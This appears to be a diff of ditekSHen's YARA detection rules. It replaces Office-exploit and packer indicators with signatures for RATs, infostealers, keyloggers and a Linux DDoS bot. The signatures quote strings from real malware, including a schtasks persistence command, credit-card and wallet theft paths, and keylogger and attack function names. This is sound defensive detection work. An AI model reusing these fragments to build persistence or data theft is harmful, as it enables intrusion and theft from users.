+		$data8 = "webcam.bmp" nocase ascii wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and 5 of ( $str* ) and 1 of ( $data* )
 }
-rule DITEKSHEN_INDICATOR_EXE_Python_Byte_Compiled : FILE
+rule DITEKSHEN_MALWARE_Win_Xpertrat : FILE
 {
 	meta:
-		description = "Detects python-byte compiled executables"
+		description = "XpertRAT payload"
 		author = "ditekSHen"
-		id = "04ae604c-6176-54cf-98e9-4386e52420f8"
+		id = "cea7de47-b47c-5fea-96ee-5858b16cca8d"
 		date = "2020-11-06"
-		modified = "2023-08-29"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_packed.yar#L211-L220"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L28-L56"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "212d525509a4d8fb7f1b5efa929526c8758549bfdb8591c88ce602315e6b3147"
+		logic_hash = "2a521bd1d6ce16fa16aa7757db2657dcab15e6802454ad899906d4ed17401feb"
 		score = 75
-		quality = 75
+		quality = 63
 		tags = "FILE"
-		importance = 20
+		snort_sid = "920003-920006"
+		clamav_sig = "MALWARE.Win.Trojan.XpertRAT"
 
 	strings:
-		$s1 = "b64decode" ascii
-		$s2 = "decompress" ascii
+		$v1 = "[XpertRAT-Mutex]" fullword wide
+		$v2 = "XPERTPLUGIN" fullword wide
+		$v3 = "+Xpert+3." wide
+		$v4 = "keylog.tmp" fullword wide
+		$v5 = "\\TempReg.reg" fullword wide
+		$s1 = "ClsKeylogger" fullword ascii nocase
+		$s2 = "clsCamShot" fullword ascii nocase
+		$s3 = "ClsShellCommand" fullword ascii nocase
+		$s4 = "ClsRemoteDesktop" fullword ascii nocase
+		$s5 = "ClsScreenRemote" fullword ascii nocase
+		$s6 = "ClsSoundRemote" fullword ascii nocase
+		$s7 = "MdlHidder" fullword ascii
+		$s8 = "modKeylog" fullword ascii
+		$s9 = "modWipe" fullword ascii
+		$s10 = "modDelProcInUse" fullword ascii
+		$s11 = "Socket_DataArrival" fullword ascii
+		$s12 = "cZip_EndCompress" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x0a0df303 and filesize < 5KB and all of them
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $v* ) or 6 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_MSI_EXE2MSI : FILE
+rule DITEKSHEN_MALWARE_Win_Isrstealer : FILE
 {
 	meta:
-		description = "Detects executables converted to .MSI packages using a free online converter."
+		description = "ISRStealer payload"
 		author = "ditekSHen"
-		id = "039df7b6-e4bf-5537-ae5b-f2168044e77e"
+		id = "d6c3acdd-e881-5f97-8856-b7b60f56a1c2"
 		date = "2020-11-06"
-		modified = "2023-08-29"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_packed.yar#L222-L233"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L112-L128"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "afd48b54766600805ae1aeef13b11de4ca160ea1f96419a4090ab9dae55fa4cd"
+		logic_hash = "5dd030ab8122b5dd432168647c7a3465cb3593a326f68b4863a91d16587641e5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort2_sid = "930061-930063"
-		snort3_sid = "930022"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.ISRStealer"
 
 	strings:
-		$winin = "Windows Installer" ascii
-		$title = "Exe to msi converter free" ascii
+		$s1 = "&password=" wide
+		$s2 = "&pcname=" wide
+		$s3 = "MSVBVM60.DLL" ascii
+		$s4 = "MSVBVM60.DLL" wide
+		$s5 = "Core Software For : Public" wide
+		$s6 = "</Host>" wide
+		$s7 = "</Pass>" wide
+		$s8 = "/scomma" wide
 
 	condition:
-		uint32( 0 ) == 0xe011cfd0 and ( $winin and $title )
+		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 6 of them ) or all of them
 }
-rule DITEKSHEN_INDICATOR_PY_Packed_Pyminifier : FILE
+rule DITEKSHEN_MALWARE_Win_Limerat : FILE
 {
 	meta:
-		description = "Detects python code potentially obfuscated using PyMinifier"
+		description = "LimeRAT payload"
 		author = "ditekSHen"
-		id = "a111c116-a2b3-5689-8d44-221adf37e932"
+		id = "a4b85cad-97a8-514c-9380-f3e8ec95a44d"
 		date = "2020-11-06"
-		modified = "2023-08-29"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_packed.yar#L331-L339"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L152-L168"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c7e916906d4654215de6d12e1bff790f24bcf69e97a7e5314a2a057a91b135a3"
+		logic_hash = "8ae35c5fa48773b93da0b76b238fc8dbaf19fdeb6fd81bf23842c5121d620116"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		importance = 20
 
 	strings:
-		$s1 = "exec(lzma.decompress(base64.b64decode("
+		$s1 = "schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr" wide
+		$s2 = "\\vboxhook.dll" fullword wide
+		$s3 = "Win32_Processor.deviceid=\"CPU0\"" fullword wide
+		$s4 = "select CommandLine from Win32_Process where Name='{0}'" wide
+		$s5 = "Minning..." fullword wide
+		$s6 = "Regasm.exe" fullword wide
+		$s7 = "Flood!" fullword wide
+		$s8 = "Rans-Status" fullword wide
+		$s9 = "cmd.exe /c ping 0" wide
 
 	condition:
-		( uint32( 0 ) == 0x6f706d69 or uint16( 0 ) == 0x2123 or uint16( 0 ) == 0x0a0d or uint16( 0 ) == 0x5a4d ) and all of them
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_INDICATOR_RTF_EXPLOIT_CVE_2017_0199_1 : CVE_2017_0199 FILE
+rule DITEKSHEN_MALWARE_Win_Arkei : FILE
 {
 	meta:
-		description = "Detects RTF documents potentially exploiting CVE-2017-0199"
+		description = "Detect Arkei infostealer variants"
 		author = "ditekSHen"
-		id = "74b3702a-7b4d-58be-ad2c-c2b1cf0ebc50"
+		id = "d32a27bf-abb9-553c-9913-d675c340a5c5"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L1-L69"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L210-L226"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "06b75267f00b775a6c1cd7a2022a9cfa0ea2c976f969c2c066be51449f197f58"
+		logic_hash = "8a79bcc6ac94900c8a8913b2e81424bf900bbac416f44a91db6f208f23980155"
 		score = 75
 		quality = 75
-		tags = "CVE-2017-0199, FILE"
+		tags = "FILE"
 
 	strings:
-		$urlmoniker3 = { 45 0a 30 0a 43 0a 39 0a 45 0a 41 0a 37 0a 39 0a
-                         46 0a 39 0a 42 0a 41 0a 43 0a 45 0a 31 0a 31 0a
-                         38 0a 43 0a 38 0a 32 0a 30 0a 30 0a 41 0a 41 0a
-                         30 0a 30 0a 34 0a 42 0a 41 0a 39 0a 30 0a 42 }
-		$urlmoniker4 = { 45 0d 0a 30 0d 0a 43 0d 0a 39 0d 0a 45 0d 0a 41
-                         0d 0a 37 0d 0a 39 0d 0a 46 0d 0a 39 0d 0a 42 0d
-                         0a 41 0d 0a 43 0d 0a 45 0d 0a 31 0d 0a 31 0d 0a
-                         38 0d 0a 43 0d 0a 38 0d 0a 32 0d 0a 30 0d 0a 30
-                         0d 0a 41 0d 0a 41 0d 0a 30 0d 0a 30 0d 0a 34 0d
-                         0a 42 0d 0a 41 0d 0a 39 0d 0a 30 0d 0a 42 }
-		$urlmoniker6 = { 65 0a 30 0a 63 0a 39 0a 65 0a 61 0a 37 0a 39 0a
-                         66 0a 39 0a 62 0a 61 0a 63 0a 65 0a 31 0a 31 0a
-                         38 0a 63 0a 38 0a 32 0a 30 0a 30 0a 61 0a 61 0a
-                         30 0a 30 0a 34 0a 62 0a 61 0a 39 0a 30 0a 62 }
-		$urlmoniker7 = { 65 0d 0a 30 0d 0a 63 0d 0a 39 0d 0a 65 0d 0a 61
-                         0d 0a 37 0d 0a 39 0d 0a 66 0d 0a 39 0d 0a 62 0d
-                         0a 61 0d 0a 63 0d 0a 65 0d 0a 31 0d 0a 31 0d 0a
-                         38 0d 0a 63 0d 0a 38 0d 0a 32 0d 0a 30 0d 0a 30
-                         0d 0a 61 0d 0a 61 0d 0a 30 0d 0a 30 0d 0a 34 0d
-                         0a 62 0d 0a 61 0d 0a 39 0d 0a 30 0d 0a 62 }
-		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
-		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
-		$ole3 = "64306366313165306131623131616531" ascii
-		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31" ascii nocase
-		$ole5 = { 64 0a 30 0a 63 0a 66 0a 31 0a 31 0a 65 0a 30 }
-		$ole6 = { 64 0d 0a 30 0d 0a 63 0d 0a 66 0d 0a 31 0d 0a 31 0d 0a 65 0d 0a 30 }
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
+		$s1 = "C:\\Windows\\System32\\cmd.exe" fullword ascii wide
+		$s2 = "/c taskkill /im " fullword ascii
+		$s3 = "card_number_encrypted FROM credit_cards" ascii
+		$s4 = "\\wallet.dat" ascii
+		$s5 = "Arkei/" wide
+		$s6 = "files\\passwords." ascii wide
+		$s7 = "files\\cc_" ascii wide
+		$s8 = "files\\autofill_" ascii wide
+		$s9 = "files\\cookies_" ascii wide
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and 1 of ( $urlmoniker* ) and 1 of ( $ole* ) and 1 of ( $obj* )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_INDICATOR_RTF_EXPLOIT_CVE_2017_8759_1 : CVE_2017_8759 FILE
+rule DITEKSHEN_MALWARE_Win_Obliquerat : FILE
 {
 	meta:
-		description = "detects CVE-2017-8759 weaponized RTF documents."
+		description = "ObliqueRAT payload"
 		author = "ditekSHen"
-		id = "8f873145-b909-5185-9f85-07c820d1f38e"
+		id = "5a184299-6c16-56b3-88da-37435fbfcde5"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L215-L238"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L294-L314"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "595dc0153a2349fbd4f92dd544a3dfd05715059dd639653e7c7e6ac80624360e"
+		logic_hash = "0b8bbf031364b828a972c52e1a8985ff65601ca7413e6e7ae3a5be981f086b9e"
 		score = 75
-		quality = 75
-		tags = "CVE-2017-8759, FILE"
+		quality = 25
+		tags = "FILE"
 
 	strings:
-		$clsid1 = { 00 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
-		$clsid2 = { 00 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
-		$clsid3 = "0003000000000000c000000000000046" ascii nocase
-		$clsid4 = "4f4c45324c696e6b" ascii nocase
-		$clsid5 = "OLE2Link" ascii nocase
-		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
-		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
-		$ole3 = "64306366313165306131623131616531" ascii
-		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
-		$s1 = "wsdl=http" wide
-		$s2 = "METAFILEPICT" ascii
-		$s3 = "INCLUDEPICTURE \"http" ascii
-		$s4 = "!This program cannot be run in DOS mode" ascii
+		$s1 = "C:\\ProgramData\\auto.txt" fullword ascii
+		$s2 = "C:\\ProgramData\\System\\Dump\\" fullword ascii
+		$s3 = "C:\\ProgramData\\a.txt" fullword ascii
+		$s4 = "Oblique" fullword ascii
+		$s5 = /(Removable|Hard|Network|CD|RAM)\sDisk\|/ ascii
+		$s6 = "backed" fullword ascii
+		$s7 = "restart" fullword ascii
+		$s8 = "kill" fullword ascii
+		$s9 = /(John|JOHN|Test|TEST|Johsnson|Artifact|Vince|Serena|Lisa|JOHNSON|VINCE|SERENA)/ ascii nocase
+		$v1 = "C:\\ProgramData" fullword ascii
+		$v2 = "auto" fullword ascii
+		$v3 = "plit" fullword ascii
+		$v4 = ":image/jpeg" fullword wide
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and 1 of ( $clsid* ) and 1 of ( $ole* ) and 2 of ( $s* )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-rule DITEKSHEN_INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 : CVE_2017_8759 FILE
+rule DITEKSHEN_MALWARE_Win_Firebirdrat : FILE
 {
 	meta:
-		description = "detects CVE-2017-8759 weaponized RTF documents."
+		description = "Firebird/Hive RAT payload"
 		author = "ditekSHen"
-		id = "92c8f45e-3792-51b3-bda4-7e9eae0e9a80"
+		id = "456ae70e-8004-5fb0-a4fd-ce7c0f4704f9"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L240-L268"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L316-L339"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "15c9a5cfce5d1a797bab049352d8506b8bc112cabe2f510019f5d203690419e8"
-		score = 40
-		quality = 25
-		tags = "CVE-2017-8759, FILE"
+		logic_hash = "1c24e924171db1b99a3b03764f4551b6f4b6b1c9c6147b49dbc0651e85e9040c"
+		score = 75
+		quality = 73
+		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.Firebird-HiveRAT"
 
 	strings:
-		$clsid1 = { 88 d9 6a 0c f1 92 11 d4 a6 5f 00 40 96 32 51 e5 }
-		$clsid2 = "88d96a0cf19211d4a65f0040963251e5" ascii nocase
-		$clsid3 = "4d73786d6c322e534158584d4c5265616465722e" ascii nocase
-		$clsid4 = "Msxml2.SAXXMLReader." ascii nocase
-		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
-		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
-		$ole3 = "64306366313165306131623131616531" ascii
-		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
-		$obj7 = "\\objclass htmlfile" ascii
-		$soap1 = "c7b0abec197fd211978e0000f8757e" ascii nocase
+		$id1 = "Firebird Remote Administration Tool" fullword wide
+		$id2 = "Welcome to Firebird! Your system is currently being monitored" wide
+		$id3 = "Hive Remote Administration Tool" fullword wide
+		$id4 = "Welcome to Hive! Your system is currently being monitored" wide
+		$s1 = "REPLACETHESEKEYSTROKES" fullword wide
+		$s2 = "_ENABLE_PROFILING" fullword wide
+		$s3 = ": KeylogSubject" wide
+		$s4 = "Firebird.CommandHandler" fullword wide
+		$s5 = "webcamenabled" fullword ascii
+		$s6 = "screenlogs" fullword ascii
+		$s7 = "encryptedconnection" fullword ascii
+		$s8 = "monitoron" fullword ascii
+		$s9 = "screenGrab" fullword ascii
+		$s10 = "TCP_TABLE_OWNER_PID_ALL" fullword ascii
+		$s11 = "de4fuckyou" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and 1 of ( $clsid* ) and 1 of ( $ole* ) and ( 2 of ( $obj* ) or 1 of ( $soap* ) )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $id* ) or 7 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_RTF_Exploit_Scripting : CVE_2017_8759 CVE_2017_8570 FILE
+rule DITEKSHEN_MALWARE_Win_Phoenix : FILE
 {
 	meta:
-		description = "detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents."
+		description = "Phoenix/404KeyLogger keylogger payload"
 		author = "ditekSHen"
-		id = "e8fd1231-3ef5-5b0b-987c-f55337804da3"
+		id = "62101881-9b5e-586d-8e1b-184787f25d6b"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L270-L302"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L341-L367"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a1f4c833f0132dcbe2b3677d6ac0f3597c152702515375d60d4332c21183bd76"
+		logic_hash = "b2c2a4ffc36d708a121853fb0268e6dc85b3fe2cd58e05c8124cbef18e03ec0b"
 		score = 75
 		quality = 75
-		tags = "CVE-2017-8759, CVE-2017-8570, FILE"
+		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.Phoenix-Keylogger"
 
 	strings:
-		$clsid1 = { 00 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
-		$clsid2 = "0003000000000000c000000000000046" ascii nocase
-		$clsid3 = "4f4c45324c696e6b" ascii nocase
-		$clsid4 = "OLE2Link" ascii nocase
-		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
-		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
-		$ole3 = "64306366313165306131623131616531" ascii
-		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
-		$ole5 = { 64 30 63 66 [0-2] 31 31 65 30 61 31 62 31 31 61 65 31 }
-		$ole6 = "D0cf11E" ascii nocase
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
-		$obj7 = "\\mmath" ascii
-		$obj8 = "\\objclass htmlfile" ascii
-		$sct1 = { 33 (43|63) (3533|3733) (3433|3633) (3532|3732) (3439|3639)( 3530|3730) (3534|3734) (3443|3643) (3435|3635) (3534|3734) }
-		$sct2 = { (3737|3537) (3733|3533) (3633|3433) (3732|3532) (3639|3439) (3730|3530) (3734|3534) (3245|3265) (3733|3533) (3638|3438) (3635|3435) (3643|3443) (3643|3443) }
+		$s1 = "FirefoxPassReader" fullword ascii
+		$s2 = "StartKeylogger" fullword ascii
+		$s3 = "CRYPTPROTECT_" ascii
+		$s4 = "Chrome_Killer" fullword ascii
+		$s5 = "Clipboardlog.txt" fullword wide
+		$s6 = "Leyboardlogs.txt" fullword wide
+		$s7 = "Persistence'" wide
+		$s8 = "set_HKB" fullword ascii
+		$s9 = "loloa" fullword ascii
+		$s10 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)" fullword wide
+		$m1 = "- Screenshot -------|" ascii wide
+		$m2 = "- Clipboard -------|" ascii wide
+		$m3 = "- Logs -------|" ascii wide
+		$m4 = "- Passwords -------|" ascii wide
+		$m5 = "PSWD" ascii wide
+		$m6 = "Screenshot |" ascii wide
+		$m7 = "Logs |" ascii wide
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and 1 of ( $clsid* ) and 1 of ( $ole* ) and 1 of ( $obj* ) and 1 of ( $sct* )
+		( uint16( 0 ) == 0x5a4d and 6 of ( $s* ) or 3 of ( $m* ) ) or 9 of them
 }
-rule DITEKSHEN_INDICATOR_RTF_Embedded_Excel_Sheetmacroenabled : FILE
+rule DITEKSHEN_MALWARE_Win_Backnet : FILE
 {
 	meta:
-		description = "Detects RTF documents embedding an Excel sheet with macros enabled. Observed in exploit followed by dropper behavior"
+		description = "BackNet payload"
 		author = "ditekSHen"
-		id = "342d10b3-61d2-5fcb-8f4f-1fe45049257b"
+		id = "c53ef72f-4957-5ddb-b096-dcdb69cf900d"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L304-L328"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L369-L386"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cc3b52e549c2697c6e0a2fea365d193311d90d26854bd2fe321aa26c118975a0"
+		logic_hash = "c276f2b809caad680455fc4ca0a021887d4ff2c9114f05737542a1d3c5cca848"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.BackNet"
 
 	strings:
-		$ex1 = "457863656c2e53686565744d6163726f456e61626c65642e" ascii nocase
-		$ex2 = "0002083200000000c000000000000046" ascii nocase
-		$ex3 = "Excel.SheetMacroEnabled." ascii
-		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
-		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
-		$ole3 = "64306366313165306131623131616531" ascii
-		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
-		$obj7 = "\\mmath" ascii
+		$s1 = "Slave.Commands." fullword ascii
+		$s2 = "StartKeylogger" fullword ascii
+		$s3 = "StopKeylogger" fullword ascii
+		$s4 = "KeyLoggerCommand" fullword ascii
+		$s5 = "get_keyLoggerManager" fullword ascii
+		$s6 = "get_IgnoreMutex" fullword ascii
+		$s7 = "ListProcesses" fullword ascii
+		$s8 = "downloadurl" fullword wide
+		$pdb = "\\BackNet-master\\Slave\\obj\\Release\\Slave.pdb" ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and ( 1 of ( $ex* ) and 1 of ( $ole* ) and 2 of ( $obj* ) )
+		uint16( 0 ) == 0x5a4d and ( $pdb or all of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_OLE_Metadatacmd : FILE
+rule DITEKSHEN_MALWARE_Win_Acridrain : FILE
 {
 	meta:
-		description = "Detects OLE documents with Windows command-line utilities commands (certutil, powershell, etc.) stored in the metadata (author, last modified by, etc.)."
+		description = "AcidRain stealer payload"
 		author = "ditekSHen"
-		id = "63b23630-b344-5fba-95f4-950d072beaff"
+		id = "9890c9e0-ce53-5f08-9077-c73a9e4ba29c"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L330-L349"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L388-L401"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0562d026a1ad4510310ebff5da154064f92afc7bf714973f7de362435476772c"
+		logic_hash = "11884073f4bf466503b07f297ae7fad188f79df148fcc7ca48827c7dbd07e211"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$cmd1 = { 00 1E 00 00 00 [1-4] 00 00 (63|43) (6D|4D) (64|44) (00|20) }
-		$cmd2 = { 00 1E 00 00 00 [1-4] 00 00 (6D|4D) (73|53) (68|48) (74|54) (61|41) (00|20) }
-		$cmd3 = { 00 1E 00 00 00 [1-4] 00 00 (77|57) (73|53) (63|43) (72|52) (69|49) (70|50) (74|54) (00|20) }
-		$cmd4 = { 00 1E 00 00 00 [1-4] 00 00 (63|42) (65|45) (72|52) (74|54) (75|55) (74|54) (69|49) (6C|4C) (00|20) }
-		$cmd5 = { 00 1E 00 00 00 [1-4] 00 00 (70|50) (6F|4F) (77|57) (65|45) (72|52) (73|43) (68|48) (65|45) (6C|4C) (6C|4C) (00|20) }
-		$cmd6 = { 00 1E 00 00 00 [1-4] 00 00 (6E|4E) (65|45) (74|54) 2E (77|57) (65|45) (62|42) (63|43) (6C|4C) (69|49) (65|45) (6E|4E) (74|54) (00|20) }
+		$s1 = { 43 6f 6f 6b 69 65 73 (5c|2e) }
+		$s2 = { 74 65 6d 70 6c 6f 67 69 ?? }
+		$s3 = { 74 65 6d 70 50 ?? 68 }
+		$s4 = "Connecting to hostname: %s%s%s" fullword ascii
+		$s5 = "Found bundle for host %s: %p [%s]" fullword ascii
+		$s6 = "encryptedUsernamencryptedPassworERROR Don't copy string" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and any of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_INDICATOR_RTF_Equation_Bitsadmin_Downloader : FILE
+rule DITEKSHEN_MALWARE_Linux_Chachaddos : FILE
 {
 	meta:
-		description = "Detects RTF documents that references both Microsoft Equation Editor and BITSAdmin. Common exploit + dropper behavior."
+		description = "ChaChaDDoS variant of XorDDoS payload"
 		author = "ditekSHen"
-		id = "e96a6f18-9a5e-58ca-829e-c82b444ad403"
+		id = "78a5cf3a-0e84-59bd-a936-bd335647e3d0"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L428-L451"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L403-L418"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "39a07a0af243e929a6b3df48b6cf8a9d30bc8ef9e7deac494348945427b015e7"
+		logic_hash = "2bf99771046650820f02a24d5bd825afeacd03d1e865b05d8563a3ef74d521fb"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort2_sid = "910002-910003"
-		snort3_sid = "910001"
-		clamav_sig = "INDICATOR.RTF.EquationBITSAdminDownloader"
 
 	strings:
-		$eq = "0200000002CE020000000000C000000000000046" ascii nocase
-		$ba = "6269747361646d696e" ascii nocase
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
-		$obj7 = "\\mmath" ascii
+		$x1 = "[kworker/1:1]" ascii
+		$x2 = "-- LuaSocket toolkit." ascii
+		$x3 = "/etc/resolv.conf" ascii
+		$x4 = "\"macaddress=\" .. DEVICE_MAC .. \"&device=\" .." ascii
+		$x5 = "easy_attack_dns" ascii
+		$x6 = "easy_attack_udp" ascii
+		$x7 = "easy_attack_syn" ascii
+		$x8 = "syn_probe" ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and ( ( $eq and $ba ) and 1 of ( $obj* ) )
+		uint16( 0 ) == 0x457f and 6 of them
 }
-rule DITEKSHEN_INDICATOR_RTF_Equation_Certutil_Downloader : FILE
+rule DITEKSHEN_MALWARE_Multi_Exaramel : FILE
 {
 	meta:
-		description = "Detects RTF documents that references both Microsoft Equation Editor and CertUtil. Common exploit + dropper behavior."
+		description = "Exaramel Windows/Linux backdoor payload"
 		author = "ditekSHen"
-		id = "a47f31f9-91fc-5009-8aff-2b9e334c3139"
+		id = "014f10f3-4502-5719-93f6-4b2940f53876"
 		date = "2020-11-06"
-		modified = "2024-09-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L453-L476"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L420-L459"
